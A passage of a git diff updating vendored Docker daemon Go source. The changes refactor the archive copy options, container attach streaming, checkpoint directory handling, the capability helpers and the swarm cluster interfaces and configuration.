index 0000000000..766ba9fdb1
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/archive_tarcopyoptions.go
@@ -0,0 +1,15 @@
+package daemon // import "github.com/docker/docker/daemon"
+
+import (
+	"github.com/docker/docker/pkg/archive"
+)
+
+// defaultTarCopyOptions is the setting that is used when unpacking an archive
+// for a copy API event.
+func (daemon *Daemon) defaultTarCopyOptions(noOverwriteDirNonDir bool) *archive.TarOptions {
+	return &archive.TarOptions{
+		NoOverwriteDirNonDir: noOverwriteDirNonDir,
+		UIDMaps:              daemon.idMappings.UIDs(),
+		GIDMaps:              daemon.idMappings.GIDs(),
+	}
+}
diff --git a/vendor/github.com/docker/docker/daemon/archive_tarcopyoptions_unix.go b/vendor/github.com/docker/docker/daemon/archive_tarcopyoptions_unix.go
new file mode 100644
index 0000000000..d70904564b
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/archive_tarcopyoptions_unix.go
@@ -0,0 +1,25 @@
+// +build !windows
+
+package daemon // import "github.com/docker/docker/daemon"
+
+import (
+	"github.com/docker/docker/container"
+	"github.com/docker/docker/pkg/archive"
+	"github.com/docker/docker/pkg/idtools"
+)
+
+func (daemon *Daemon) tarCopyOptions(container *container.Container, noOverwriteDirNonDir bool) (*archive.TarOptions, error) {
+	if container.Config.User == "" {
+		return daemon.defaultTarCopyOptions(noOverwriteDirNonDir), nil
+	}
+
+	user, err := idtools.LookupUser(container.Config.User)
+	if err != nil {
+		return nil, err
+	}
+
+	return &archive.TarOptions{
+		NoOverwriteDirNonDir: noOverwriteDirNonDir,
+		ChownOpts:            &idtools.IDPair{UID: user.Uid, GID: user.Gid},
+	}, nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/archive_tarcopyoptions_windows.go b/vendor/github.com/docker/docker/daemon/archive_tarcopyoptions_windows.go
new file mode 100644
index 0000000000..5142496f03
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/archive_tarcopyoptions_windows.go
@@ -0,0 +1,10 @@
+package daemon // import "github.com/docker/docker/daemon"
+
+import (
+	"github.com/docker/docker/container"
+	"github.com/docker/docker/pkg/archive"
+)
+
+func (daemon *Daemon) tarCopyOptions(container *container.Container, noOverwriteDirNonDir bool) (*archive.TarOptions, error) {
+	return daemon.defaultTarCopyOptions(noOverwriteDirNonDir), nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/archive_unix.go b/vendor/github.com/docker/docker/daemon/archive_unix.go
index 47666fe5e8..50e6fe24be 100644
--- a/vendor/github.com/docker/docker/daemon/archive_unix.go
+++ b/vendor/github.com/docker/docker/daemon/archive_unix.go
@@ -1,12 +1,10 @@
 // +build !windows
 
-package daemon
+package daemon // import "github.com/docker/docker/daemon"
 
 import (
-	"os"
-	"path/filepath"
-
 	"github.com/docker/docker/container"
+	volumemounts "github.com/docker/docker/volume/mounts"
 )
 
 // checkIfPathIsInAVolume checks if the path is in a volume. If it is, it
@@ -14,8 +12,9 @@ import (
 // cannot be configured with a read-only rootfs.
 func checkIfPathIsInAVolume(container *container.Container, absPath string) (bool, error) {
 	var toVolume bool
+	parser := volumemounts.NewParser(container.OS)
 	for _, mnt := range container.MountPoints {
-		if toVolume = mnt.HasResource(absPath); toVolume {
+		if toVolume = parser.HasResource(mnt, absPath); toVolume {
 			if mnt.RW {
 				break
 			}
@@ -25,34 +24,8 @@ func checkIfPathIsInAVolume(container *container.Container, absPath string) (boo
 	return toVolume, nil
 }
 
-func fixPermissions(source, destination string, uid, gid int, destExisted bool) error {
-	// If the destination didn't already exist, or the destination isn't a
-	// directory, then we should Lchown the destination. Otherwise, we shouldn't
-	// Lchown the destination.
-	destStat, err := os.Stat(destination)
-	if err != nil {
-		// This should *never* be reached, because the destination must've already
-		// been created while untar-ing the context.
-		return err
-	}
-	doChownDestination := !destExisted || !destStat.IsDir()
-
-	// We Walk on the source rather than on the destination because we don't
-	// want to change permissions on things we haven't created or modified.
-	return filepath.Walk(source, func(fullpath string, info os.FileInfo, err error) error {
-		// Do not alter the walk root iff. it existed before, as it doesn't fall under
-		// the domain of "things we should chown".
-		if !doChownDestination && (source == fullpath) {
-			return nil
-		}
-
-		// Path is prefixed by source: substitute with destination instead.
-		cleaned, err := filepath.Rel(source, fullpath)
-		if err != nil {
-			return err
-		}
-
-		fullpath = filepath.Join(destination, cleaned)
-		return os.Lchown(fullpath, uid, gid)
-	})
+// isOnlineFSOperationPermitted returns an error if an online filesystem operation
+// is not permitted.
+func (daemon *Daemon) isOnlineFSOperationPermitted(container *container.Container) error {
+	return nil
 }
diff --git a/vendor/github.com/docker/docker/daemon/archive_windows.go b/vendor/github.com/docker/docker/daemon/archive_windows.go
index b3a1045341..8cec39c5e4 100644
--- a/vendor/github.com/docker/docker/daemon/archive_windows.go
+++ b/vendor/github.com/docker/docker/daemon/archive_windows.go
@@ -1,6 +1,11 @@
-package daemon
+package daemon // import "github.com/docker/docker/daemon"
 
-import "github.com/docker/docker/container"
+import (
+	"errors"
+
+	containertypes "github.com/docker/docker/api/types/container"
+	"github.com/docker/docker/container"
+)
 
 // checkIfPathIsInAVolume checks if the path is in a volume. If it is, it
 // cannot be in a read-only volume. If it  is not in a volume, the container
@@ -12,7 +17,23 @@ func checkIfPathIsInAVolume(container *container.Container, absPath string) (boo
 	return false, nil
 }
 
-func fixPermissions(source, destination string, uid, gid int, destExisted bool) error {
-	// chown is not supported on Windows
+// isOnlineFSOperationPermitted returns an error if an online filesystem operation
+// is not permitted (such as stat or for copying). Running Hyper-V containers
+// cannot have their file-system interrogated from the host as the filter is
+// loaded inside the utility VM, not the host.
+// IMPORTANT: The container lock must NOT be held when calling this function.
+func (daemon *Daemon) isOnlineFSOperationPermitted(container *container.Container) error {
+	if !container.IsRunning() {
+		return nil
+	}
+
+	// Determine isolation. If not specified in the hostconfig, use daemon default.
+	actualIsolation := container.HostConfig.Isolation
+	if containertypes.Isolation.IsDefault(containertypes.Isolation(actualIsolation)) {
+		actualIsolation = daemon.defaultIsolation
+	}
+	if containertypes.Isolation.IsHyperV(actualIsolation) {
+		return errors.New("filesystem operations against a running Hyper-V container are not supported")
+	}
 	return nil
 }
diff --git a/vendor/github.com/docker/docker/daemon/attach.go b/vendor/github.com/docker/docker/daemon/attach.go
index 917237dd89..fb14691d24 100644
--- a/vendor/github.com/docker/docker/daemon/attach.go
+++ b/vendor/github.com/docker/docker/daemon/attach.go
@@ -1,17 +1,19 @@
-package daemon
+package daemon // import "github.com/docker/docker/daemon"
 
 import (
+	"context"
 	"fmt"
 	"io"
-	"time"
 
-	"github.com/Sirupsen/logrus"
-	"github.com/docker/docker/api/errors"
 	"github.com/docker/docker/api/types/backend"
 	"github.com/docker/docker/container"
+	"github.com/docker/docker/container/stream"
 	"github.com/docker/docker/daemon/logger"
+	"github.com/docker/docker/errdefs"
 	"github.com/docker/docker/pkg/stdcopy"
 	"github.com/docker/docker/pkg/term"
+	"github.com/pkg/errors"
+	"github.com/sirupsen/logrus"
 )
 
 // ContainerAttach attaches to logs according to the config passed in. See ContainerAttachConfig.
@@ -21,7 +23,7 @@ func (daemon *Daemon) ContainerAttach(prefixOrName string, c *backend.ContainerA
 	if c.DetachKeys != "" {
 		keys, err = term.ToBytes(c.DetachKeys)
 		if err != nil {
-			return fmt.Errorf("Invalid escape keys (%s) provided", c.DetachKeys)
+			return errdefs.InvalidParameter(errors.Errorf("Invalid detach keys (%s) provided", c.DetachKeys))
 		}
 	}
 
@@ -30,9 +32,23 @@ func (daemon *Daemon) ContainerAttach(prefixOrName string, c *backend.ContainerA
 		return err
 	}
 	if container.IsPaused() {
-		err := fmt.Errorf("Container %s is paused. Unpause the container before attach", prefixOrName)
-		return errors.NewRequestConflictError(err)
+		err := fmt.Errorf("container %s is paused, unpause the container before attach", prefixOrName)
+		return errdefs.Conflict(err)
 	}
+	if container.IsRestarting() {
+		err := fmt.Errorf("container %s is restarting, wait until the container is running", prefixOrName)
+		return errdefs.Conflict(err)
+	}
+
+	cfg := stream.AttachConfig{
+		UseStdin:   c.UseStdin,
+		UseStdout:  c.UseStdout,
+		UseStderr:  c.UseStderr,
+		TTY:        container.Config.Tty,
+		CloseStdin: container.Config.StdinOnce,
+		DetachKeys: keys,
+	}
+	container.StreamConfig.AttachStreams(&cfg)
 
 	inStream, outStream, errStream, err := c.GetStreams()
 	if err != nil {
@@ -45,45 +61,69 @@ func (daemon *Daemon) ContainerAttach(prefixOrName string, c *backend.ContainerA
 		outStream = stdcopy.NewStdWriter(outStream, stdcopy.Stdout)
 	}
 
-	var stdin io.ReadCloser
-	var stdout, stderr io.Writer
-
-	if c.UseStdin {
-		stdin = inStream
+	if cfg.UseStdin {
+		cfg.Stdin = inStream
 	}
-	if c.UseStdout {
-		stdout = outStream
+	if cfg.UseStdout {
+		cfg.Stdout = outStream
 	}
-	if c.UseStderr {
-		stderr = errStream
+	if cfg.UseStderr {
+		cfg.Stderr = errStream
 	}
 
-	if err := daemon.containerAttach(container, stdin, stdout, stderr, c.Logs, c.Stream, keys); err != nil {
+	if err := daemon.containerAttach(container, &cfg, c.Logs, c.Stream); err != nil {
 		fmt.Fprintf(outStream, "Error attaching: %s\n", err)
 	}
 	return nil
 }
 
 // ContainerAttachRaw attaches the provided streams to the container's stdio
-func (daemon *Daemon) ContainerAttachRaw(prefixOrName string, stdin io.ReadCloser, stdout, stderr io.Writer, stream bool) error {
+func (daemon *Daemon) ContainerAttachRaw(prefixOrName string, stdin io.ReadCloser, stdout, stderr io.Writer, doStream bool, attached chan struct{}) error {
 	container, err := daemon.GetContainer(prefixOrName)
 	if err != nil {
 		return err
 	}
-	return daemon.containerAttach(container, stdin, stdout, stderr, false, stream, nil)
+	cfg := stream.AttachConfig{
+		UseStdin:   stdin != nil,
+		UseStdout:  stdout != nil,
+		UseStderr:  stderr != nil,
+		TTY:        container.Config.Tty,
+		CloseStdin: container.Config.StdinOnce,
+	}
+	container.StreamConfig.AttachStreams(&cfg)
+	close(attached)
+	if cfg.UseStdin {
+		cfg.Stdin = stdin
+	}
+	if cfg.UseStdout {
+		cfg.Stdout = stdout
+	}
+	if cfg.UseStderr {
+		cfg.Stderr = stderr
+	}
+
+	return daemon.containerAttach(container, &cfg, false, doStream)
 }
 
-func (daemon *Daemon) containerAttach(c *container.Container, stdin io.ReadCloser, stdout, stderr io.Writer, logs, stream bool, keys []byte) error {
+func (daemon *Daemon) containerAttach(c *container.Container, cfg *stream.AttachConfig, logs, doStream bool) error {
 	if logs {
-		logDriver, err := daemon.getLogger(c)
+		logDriver, logCreated, err := daemon.getLogger(c)
 		if err != nil {
 			return err
 		}
+		if logCreated {
+			defer func() {
+				if err = logDriver.Close(); err != nil {
+					logrus.Errorf("Error closing logger: %v", err)
+				}
+			}()
+		}
 		cLog, ok := logDriver.(logger.LogReader)
 		if !ok {
-			return logger.ErrReadLogsNotSupported
+			return logger.ErrReadLogsNotSupported{}
 		}
 		logs := cLog.ReadLogs(logger.ReadConfig{Tail: -1})
+		defer logs.Close()
 
 	LogLoop:
 		for {
@@ -92,11 +132,11 @@ func (daemon *Daemon) containerAttach(c *container.Container, stdin io.ReadClose
 				if !ok {
 					break LogLoop
 				}
-				if msg.Source == "stdout" && stdout != nil {
-					stdout.Write(msg.Line)
+				if msg.Source == "stdout" && cfg.Stdout != nil {
+					cfg.Stdout.Write(msg.Line)
 				}
-				if msg.Source == "stderr" && stderr != nil {
-					stderr.Write(msg.Line)
+				if msg.Source == "stderr" && cfg.Stderr != nil {
+					cfg.Stderr.Write(msg.Line)
 				}
 			case err := <-logs.Err:
 				logrus.Errorf("Error streaming logs: %v", err)
@@ -107,41 +147,41 @@ func (daemon *Daemon) containerAttach(c *container.Container, stdin io.ReadClose
 
 	daemon.LogContainerEvent(c, "attach")
 
-	//stream
-	if stream {
-		var stdinPipe io.ReadCloser
-		if stdin != nil {
-			r, w := io.Pipe()
-			go func() {
-				defer w.Close()
-				defer logrus.Debug("Closing buffered stdin pipe")
-				io.Copy(w, stdin)
-			}()
-			stdinPipe = r
-		}
+	if !doStream {
+		return nil
+	}
 
-		waitChan := make(chan struct{})
-		if c.Config.StdinOnce && !c.Config.Tty {
-			go func() {
-				c.WaitStop(-1 * time.Second)
-				close(waitChan)
-			}()
-		}
+	if cfg.Stdin != nil {
+		r, w := io.Pipe()
+		go func(stdin io.ReadCloser) {
+			defer w.Close()
+			defer logrus.Debug("Closing buffered stdin pipe")
+			io.Copy(w, stdin)
+		}(cfg.Stdin)
+		cfg.Stdin = r
+	}
 
-		err := <-c.Attach(stdinPipe, stdout, stderr, keys)
-		if err != nil {
-			if _, ok := err.(container.DetachError); ok {
-				daemon.LogContainerEvent(c, "detach")
-			} else {
-				logrus.Errorf("attach failed with error: %v", err)
-			}
-		}
+	if !c.Config.OpenStdin {
+		cfg.Stdin = nil
+	}
+
+	if c.Config.StdinOnce && !c.Config.Tty {
+		// Wait for the container to stop before returning.
+		waitChan := c.Wait(context.Background(), container.WaitConditionNotRunning)
+		defer func() {
+			<-waitChan // Ignore returned exit code.
+		}()
+	}
 
-		// If we are in stdinonce mode, wait for the process to end
-		// otherwise, simply return
-		if c.Config.StdinOnce && !c.Config.Tty {
-			<-waitChan
+	ctx := c.InitAttachContext()
+	err := <-c.StreamConfig.CopyStreams(ctx, cfg)
+	if err != nil {
+		if _, ok := errors.Cause(err).(term.EscapeError); ok || err == context.Canceled {
+			daemon.LogContainerEvent(c, "detach")
+		} else {
+			logrus.Errorf("attach failed with error: %v", err)
 		}
 	}
+
 	return nil
 }
diff --git a/vendor/github.com/docker/docker/daemon/auth.go b/vendor/github.com/docker/docker/daemon/auth.go
index f5f4d7bf24..d32c28b8dd 100644
--- a/vendor/github.com/docker/docker/daemon/auth.go
+++ b/vendor/github.com/docker/docker/daemon/auth.go
@@ -1,7 +1,7 @@
-package daemon
+package daemon // import "github.com/docker/docker/daemon"
 
 import (
-	"golang.org/x/net/context"
+	"context"
 
 	"github.com/docker/docker/api/types"
 	"github.com/docker/docker/dockerversion"
diff --git a/vendor/github.com/docker/docker/daemon/bindmount_solaris.go b/vendor/github.com/docker/docker/daemon/bindmount_solaris.go
deleted file mode 100644
index 87bf3ef72e..0000000000
--- a/vendor/github.com/docker/docker/daemon/bindmount_solaris.go
+++ /dev/null
@@ -1,5 +0,0 @@
-// +build solaris
-
-package daemon
-
-const bindMountType = "lofs"
diff --git a/vendor/github.com/docker/docker/daemon/bindmount_unix.go b/vendor/github.com/docker/docker/daemon/bindmount_unix.go
index 3966babb41..028e300b06 100644
--- a/vendor/github.com/docker/docker/daemon/bindmount_unix.go
+++ b/vendor/github.com/docker/docker/daemon/bindmount_unix.go
@@ -1,5 +1,5 @@
 // +build linux freebsd
 
-package daemon
+package daemon // import "github.com/docker/docker/daemon"
 
 const bindMountType = "bind"
diff --git a/vendor/github.com/docker/docker/daemon/caps/utils_unix.go b/vendor/github.com/docker/docker/daemon/caps/utils.go
similarity index 84%
rename from vendor/github.com/docker/docker/daemon/caps/utils_unix.go
rename to vendor/github.com/docker/docker/daemon/caps/utils.go
index c99485f51d..c5ded542ef 100644
--- a/vendor/github.com/docker/docker/daemon/caps/utils_unix.go
+++ b/vendor/github.com/docker/docker/daemon/caps/utils.go
@@ -1,12 +1,9 @@
-// +build !windows
-
-package caps
+package caps // import "github.com/docker/docker/daemon/caps"
 
 import (
 	"fmt"
 	"strings"
 
-	"github.com/docker/docker/pkg/stringutils"
 	"github.com/syndtr/gocapability/capability"
 )
 
@@ -69,6 +66,17 @@ func GetAllCapabilities() []string {
 	return output
 }
 
+// inSlice tests whether a string is contained in a slice of strings or not.
+// Comparison is case insensitive
+func inSlice(slice []string, s string) bool {
+	for _, ss := range slice {
+		if strings.ToLower(s) == strings.ToLower(ss) {
+			return true
+		}
+	}
+	return false
+}
+
 // TweakCapabilities can tweak capabilities by adding or dropping capabilities
 // based on the basics capabilities.
 func TweakCapabilities(basics, adds, drops []string) ([]string, error) {
@@ -86,17 +94,17 @@ func TweakCapabilities(basics, adds, drops []string) ([]string, error) {
 			continue
 		}
 
-		if !stringutils.InSlice(allCaps, "CAP_"+cap) {
+		if !inSlice(allCaps, "CAP_"+cap) {
 			return nil, fmt.Errorf("Unknown capability drop: %q", cap)
 		}
 	}
 
 	// handle --cap-add=all
-	if stringutils.InSlice(adds, "all") {
+	if inSlice(adds, "all") {
 		basics = allCaps
 	}
 
-	if !stringutils.InSlice(drops, "all") {
+	if !inSlice(drops, "all") {
 		for _, cap := range basics {
 			// skip `all` already handled above
 			if strings.ToLower(cap) == "all" {
@@ -104,7 +112,7 @@ func TweakCapabilities(basics, adds, drops []string) ([]string, error) {
 			}
 
 			// if we don't drop `all`, add back all the non-dropped caps
-			if !stringutils.InSlice(drops, cap[4:]) {
+			if !inSlice(drops, cap[4:]) {
 				newCaps = append(newCaps, strings.ToUpper(cap))
 			}
 		}
@@ -118,12 +126,12 @@ func TweakCapabilities(basics, adds, drops []string) ([]string, error) {
 
 		cap = "CAP_" + cap
 
-		if !stringutils.InSlice(allCaps, cap) {
+		if !inSlice(allCaps, cap) {
 			return nil, fmt.Errorf("Unknown capability to add: %q", cap)
 		}
 
 		// add cap if not already in the list
-		if !stringutils.InSlice(newCaps, cap) {
+		if !inSlice(newCaps, cap) {
 			newCaps = append(newCaps, strings.ToUpper(cap))
 		}
 	}
diff --git a/vendor/github.com/docker/docker/daemon/changes.go b/vendor/github.com/docker/docker/daemon/changes.go
index fc8cd2752c..70b3f6b943 100644
--- a/vendor/github.com/docker/docker/daemon/changes.go
+++ b/vendor/github.com/docker/docker/daemon/changes.go
@@ -1,4 +1,4 @@
-package daemon
+package daemon // import "github.com/docker/docker/daemon"
 
 import (
 	"errors"
@@ -22,6 +22,9 @@ func (daemon *Daemon) ContainerChanges(name string) ([]archive.Change, error) {
 
 	container.Lock()
 	defer container.Unlock()
+	if container.RWLayer == nil {
+		return nil, errors.New("RWLayer of container " + name + " is unexpectedly nil")
+	}
 	c, err := container.RWLayer.Changes()
 	if err != nil {
 		return nil, err
diff --git a/vendor/github.com/docker/docker/daemon/checkpoint.go b/vendor/github.com/docker/docker/daemon/checkpoint.go
index 27181743f5..4a1cb0e10e 100644
--- a/vendor/github.com/docker/docker/daemon/checkpoint.go
+++ b/vendor/github.com/docker/docker/daemon/checkpoint.go
@@ -1,6 +1,7 @@
-package daemon
+package daemon // import "github.com/docker/docker/daemon"
 
 import (
+	"context"
 	"encoding/json"
 	"fmt"
 	"io/ioutil"
@@ -8,14 +9,49 @@ import (
 	"path/filepath"
 
 	"github.com/docker/docker/api/types"
-	"github.com/docker/docker/utils"
+	"github.com/docker/docker/daemon/names"
 )
 
 var (
-	validCheckpointNameChars   = utils.RestrictedNameChars
-	validCheckpointNamePattern = utils.RestrictedNamePattern
+	validCheckpointNameChars   = names.RestrictedNameChars
+	validCheckpointNamePattern = names.RestrictedNamePattern
 )
 
+// getCheckpointDir verifies checkpoint directory for create,remove, list options and checks if checkpoint already exists
+func getCheckpointDir(checkDir, checkpointID, ctrName, ctrID, ctrCheckpointDir string, create bool) (string, error) {
+	var checkpointDir string
+	var err2 error
+	if checkDir != "" {
+		checkpointDir = checkDir
+	} else {
+		checkpointDir = ctrCheckpointDir
+	}
+	checkpointAbsDir := filepath.Join(checkpointDir, checkpointID)
+	stat, err := os.Stat(checkpointAbsDir)
+	if create {
+		switch {
+		case err == nil && stat.IsDir():
+			err2 = fmt.Errorf("checkpoint with name %s already exists for container %s", checkpointID, ctrName)
+		case err != nil && os.IsNotExist(err):
+			err2 = os.MkdirAll(checkpointAbsDir, 0700)
+		case err != nil:
+			err2 = err
+		case err == nil:
+			err2 = fmt.Errorf("%s exists and is not a directory", checkpointAbsDir)
+		}
+	} else {
+		switch {
+		case err != nil:
+			err2 = fmt.Errorf("checkpoint %s does not exists for container %s", checkpointID, ctrName)
+		case err == nil && stat.IsDir():
+			err2 = nil
+		case err == nil:
+			err2 = fmt.Errorf("%s exists and is not a directory", checkpointAbsDir)
+		}
+	}
+	return checkpointAbsDir, err2
+}
+
 // CheckpointCreate checkpoints the process running in a container with CRIU
 func (daemon *Daemon) CheckpointCreate(name string, config types.CheckpointCreateOptions) error {
 	container, err := daemon.GetContainer(name)
@@ -27,19 +63,22 @@ func (daemon *Daemon) CheckpointCreate(name string, config types.CheckpointCreat
 		return fmt.Errorf("Container %s not running", name)
 	}
 
-	var checkpointDir string
-	if config.CheckpointDir != "" {
-		checkpointDir = config.CheckpointDir
-	} else {
-		checkpointDir = container.CheckpointDir()
+	if container.Config.Tty {
+		return fmt.Errorf("checkpoint not support on containers with tty")
 	}
 
 	if !validCheckpointNamePattern.MatchString(config.CheckpointID) {
 		return fmt.Errorf("Invalid checkpoint ID (%s), only %s are allowed", config.CheckpointID, validCheckpointNameChars)
 	}
 
-	err = daemon.containerd.CreateCheckpoint(container.ID, config.CheckpointID, checkpointDir, config.Exit)
+	checkpointDir, err := getCheckpointDir(config.CheckpointDir, config.CheckpointID, name, container.ID, container.CheckpointDir(), true)
 	if err != nil {
+		return fmt.Errorf("cannot checkpoint container %s: %s", name, err)
+	}
+
+	err = daemon.containerd.CreateCheckpoint(context.Background(), container.ID, checkpointDir, config.Exit)
+	if err != nil {
+		os.RemoveAll(checkpointDir)
 		return fmt.Errorf("Cannot checkpoint container %s: %s", name, err)
 	}
 
@@ -54,15 +93,11 @@ func (daemon *Daemon) CheckpointDelete(name string, config types.CheckpointDelet
 	if err != nil {
 		return err
 	}
-
-	var checkpointDir string
-	if config.CheckpointDir != "" {
-		checkpointDir = config.CheckpointDir
-	} else {
-		checkpointDir = container.CheckpointDir()
+	checkpointDir, err := getCheckpointDir(config.CheckpointDir, config.CheckpointID, name, container.ID, container.CheckpointDir(), false)
+	if err == nil {
+		return os.RemoveAll(filepath.Join(checkpointDir, config.CheckpointID))
 	}
-
-	return os.RemoveAll(filepath.Join(checkpointDir, config.CheckpointID))
+	return err
 }
 
 // CheckpointList lists all checkpoints of the specified container
@@ -74,11 +109,9 @@ func (daemon *Daemon) CheckpointList(name string, config types.CheckpointListOpt
 		return nil, err
 	}
 
-	var checkpointDir string
-	if config.CheckpointDir != "" {
-		checkpointDir = config.CheckpointDir
-	} else {
-		checkpointDir = container.CheckpointDir()
+	checkpointDir, err := getCheckpointDir(config.CheckpointDir, "", name, container.ID, container.CheckpointDir(), false)
+	if err != nil {
+		return nil, err
 	}
 
 	if err := os.MkdirAll(checkpointDir, 0755); err != nil {
diff --git a/vendor/github.com/docker/docker/daemon/cluster.go b/vendor/github.com/docker/docker/daemon/cluster.go
index 98b2aa1e04..b5ac6c4856 100644
--- a/vendor/github.com/docker/docker/daemon/cluster.go
+++ b/vendor/github.com/docker/docker/daemon/cluster.go
@@ -1,11 +1,25 @@
-package daemon
+package daemon // import "github.com/docker/docker/daemon"
 
 import (
 	apitypes "github.com/docker/docker/api/types"
+	lncluster "github.com/docker/libnetwork/cluster"
 )
 
 // Cluster is the interface for github.com/docker/docker/daemon/cluster.(*Cluster).
 type Cluster interface {
+	ClusterStatus
+	NetworkManager
+	SendClusterEvent(event lncluster.ConfigEventType)
+}
+
+// ClusterStatus interface provides information about the Swarm status of the Cluster
+type ClusterStatus interface {
+	IsAgent() bool
+	IsManager() bool
+}
+
+// NetworkManager provides methods to manage networks
+type NetworkManager interface {
 	GetNetwork(input string) (apitypes.NetworkResource, error)
 	GetNetworks() ([]apitypes.NetworkResource, error)
 	RemoveNetwork(input string) error
diff --git a/vendor/github.com/docker/docker/daemon/cluster/cluster.go b/vendor/github.com/docker/docker/daemon/cluster/cluster.go
index 4af035b523..35ba5a9378 100644
--- a/vendor/github.com/docker/docker/daemon/cluster/cluster.go
+++ b/vendor/github.com/docker/docker/daemon/cluster/cluster.go
@@ -1,46 +1,62 @@
-package cluster
+package cluster // import "github.com/docker/docker/daemon/cluster"
+
+//
+// ## Swarmkit integration
+//
+// Cluster - static configurable object for accessing everything swarm related.
+// Contains methods for connecting and controlling the cluster. Exists always,
+// even if swarm mode is not enabled.
+//
+// NodeRunner - Manager for starting the swarmkit node. Is present only and
+// always if swarm mode is enabled. Implements backoff restart loop in case of
+// errors.
+//
+// NodeState - Information about the current node status including access to
+// gRPC clients if a manager is active.
+//
+// ### Locking
+//
+// `cluster.controlMutex` - taken for the whole lifecycle of the processes that
+// can reconfigure cluster(init/join/leave etc). Protects that one
+// reconfiguration action has fully completed before another can start.
+//
+// `cluster.mu` - taken when the actual changes in cluster configurations
+// happen. Different from `controlMutex` because in some cases we need to
+// access current cluster state even if the long-running reconfiguration is
+// going on. For example network stack may ask for the current cluster state in
+// the middle of the shutdown. Any time current cluster state is asked you
+// should take the read lock of `cluster.mu`. If you are writing an API
+// responder that returns synchronously, hold `cluster.mu.RLock()` for the
+// duration of the whole handler function. That ensures that node will not be
+// shut down until the handler has finished.
+//
+// NodeRunner implements its internal locks that should not be used outside of
+// the struct. Instead, you should just call `nodeRunner.State()` method to get
+// the current state of the cluster(still need `cluster.mu.RLock()` to access
+// `cluster.nr` reference itself). Most of the changes in NodeRunner happen
+// because of an external event(network problem, unexpected swarmkit error) and
+// Docker shouldn't take any locks that delay these changes from happening.
+//
 
 import (
-	"crypto/x509"
-	"encoding/base64"
-	"encoding/json"
+	"context"
 	"fmt"
-	"io"
-	"io/ioutil"
 	"net"
 	"os"
 	"path/filepath"
-	"runtime"
-	"strings"
 	"sync"
 	"time"
 
-	"github.com/Sirupsen/logrus"
-	"github.com/docker/distribution/digest"
-	distreference "github.com/docker/distribution/reference"
-	apierrors "github.com/docker/docker/api/errors"
-	apitypes "github.com/docker/docker/api/types"
-	"github.com/docker/docker/api/types/backend"
-	"github.com/docker/docker/api/types/filters"
 	"github.com/docker/docker/api/types/network"
 	types "github.com/docker/docker/api/types/swarm"
-	"github.com/docker/docker/daemon/cluster/convert"
+	"github.com/docker/docker/daemon/cluster/controllers/plugin"
 	executorpkg "github.com/docker/docker/daemon/cluster/executor"
-	"github.com/docker/docker/daemon/cluster/executor/container"
-	"github.com/docker/docker/daemon/logger"
-	"github.com/docker/docker/opts"
-	"github.com/docker/docker/pkg/ioutils"
 	"github.com/docker/docker/pkg/signal"
-	"github.com/docker/docker/pkg/stdcopy"
-	"github.com/docker/docker/reference"
-	"github.com/docker/docker/runconfig"
+	lncluster "github.com/docker/libnetwork/cluster"
 	swarmapi "github.com/docker/swarmkit/api"
-	"github.com/docker/swarmkit/manager/encryption"
 	swarmnode "github.com/docker/swarmkit/node"
-	"github.com/docker/swarmkit/protobuf/ptypes"
 	"github.com/pkg/errors"
-	"golang.org/x/net/context"
-	"google.golang.org/grpc"
+	"github.com/sirupsen/logrus"
 )
 
 const swarmDirName = "swarm"
@@ -56,29 +72,10 @@ const (
 	contextPrefix         = "com.docker.swarm"
 )
 
-// ErrNoSwarm is returned on leaving a cluster that was never initialized
-var ErrNoSwarm = fmt.Errorf("This node is not part of a swarm")
-
-// ErrSwarmExists is returned on initialize or join request for a cluster that has already been activated
-var ErrSwarmExists = fmt.Errorf("This node is already part of a swarm. Use \"docker swarm leave\" to leave this swarm and join another one.")
-
-// ErrPendingSwarmExists is returned on initialize or join request for a cluster that is already processing a similar request but has not succeeded yet.
-var ErrPendingSwarmExists = fmt.Errorf("This node is processing an existing join request that has not succeeded yet. Use \"docker swarm leave\" to cancel the current request.")
-
-// ErrSwarmJoinTimeoutReached is returned when cluster join could not complete before timeout was reached.
-var ErrSwarmJoinTimeoutReached = fmt.Errorf("Timeout was reached before node was joined. The attempt to join the swarm will continue in the background. Use the \"docker info\" command to see the current swarm status of your node.")
-
-// ErrSwarmLocked is returned if the swarm is encrypted and needs a key to unlock it.
-var ErrSwarmLocked = fmt.Errorf("Swarm is encrypted and needs to be unlocked before it can be used. Please use \"docker swarm unlock\" to unlock it.")
-
-// ErrSwarmCertificatesExpired is returned if docker was not started for the whole validity period and they had no chance to renew automatically.
-var ErrSwarmCertificatesExpired = errors.New("Swarm certificates have expired. To replace them, leave the swarm and join again.")
-
 // NetworkSubnetsProvider exposes functions for retrieving the subnets
 // of networks managed by Docker, so they can be filtered.
 type NetworkSubnetsProvider interface {
-	V4Subnets() []net.IPNet
-	V6Subnets() []net.IPNet
+	Subnets() ([]net.IPNet, []net.IPNet)
 }
 
 // Config provides values for Cluster.
@@ -86,6 +83,9 @@ type Config struct {
 	Root                   string
 	Name                   string
 	Backend                executorpkg.Backend
+	ImageBackend           executorpkg.ImageBackend
+	PluginBackend          plugin.Backend
+	VolumeBackend          executorpkg.VolumeBackend
 	NetworkSubnetsProvider NetworkSubnetsProvider
 
 	// DefaultAdvertiseAddr is the default host/IP or network interface to use
@@ -94,24 +94,30 @@ type Config struct {
 
 	// path to store runtime state, such as the swarm control socket
 	RuntimeRoot string
+
+	// WatchStream is a channel to pass watch API notifications to daemon
+	WatchStream chan *swarmapi.WatchMessage
+
+	// RaftHeartbeatTick is the number of ticks for heartbeat of quorum members
+	RaftHeartbeatTick uint32
+
+	// RaftElectionTick is the number of ticks to elapse before followers propose a new round of leader election
+	// This value should be 10x that of RaftHeartbeatTick
+	RaftElectionTick uint32
 }
 
 // Cluster provides capabilities to participate in a cluster as a worker or a
 // manager.
 type Cluster struct {
-	sync.RWMutex
-	*node
-	root            string
-	runtimeRoot     string
-	config          Config
-	configEvent     chan struct{} // todo: make this array and goroutine safe
-	actualLocalAddr string        // after resolution, not persisted
-	stop            bool
-	err             error
-	cancelDelay     func()
-	attachers       map[string]*attacher
-	locked          bool
-	lastNodeConfig  *nodeStartConfig
+	mu           sync.RWMutex
+	controlMutex sync.RWMutex // protect init/join/leave user operations
+	nr           *nodeRunner
+	root         string
+	runtimeRoot  string
+	config       Config
+	configEvent  chan lncluster.ConfigEventType // todo: make this array and goroutine safe
